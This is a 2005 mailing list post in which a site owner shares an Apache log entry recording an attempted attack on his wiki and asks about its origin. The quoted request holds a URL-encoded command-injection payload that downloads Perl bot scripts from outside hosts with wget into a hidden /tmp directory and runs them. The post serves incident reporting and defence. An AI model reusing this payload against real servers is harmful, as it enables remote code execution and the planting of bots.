Security Incidents mailing list archives
Attempted exploit for some web service.
From: Robin <robin () kallisti net nz>
Date: Fri, 28 Jan 2005 00:41:57 +1300
Hi, I just got this in my apache logs: 65.39.227.110 - - [28/Jan/2005:00:23:26 +1300] "GET /RobinsStuff/UnsortedLinks&r ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/ .notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6 5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527. %70%61%73%73%74%68%72%75%28%24%48%5 4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 11746 "-" "LWP::Simple/5.65" (sorry about the wrapping). Now, I know it didn't hurt the service it hit, as it's a Wiki page, and the software ignores any unexpected parameters on the URL. I'm wondering where it comes from, however. It's also useful to note that that IP address hadn't touched my webserver at all recently, other than this. Out of curiosity, I checked, and both the URLs that it tries to wget stuff from are 404. -- Robin <robin () kallisti net nz> JabberID: <eythian () jabber org> Hostes alienigeni me abduxerunt. Qui annus est? PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D
Attachment:
_bin
Description:
Current thread:
- Attempted exploit for some web service. Robin (Jan 27)
- Re: Attempted exploit for some web service. Andrew Smith (Jan 27)
- Re: Attempted exploit for some web service. Alex 'CAVE' Cernat (Jan 27)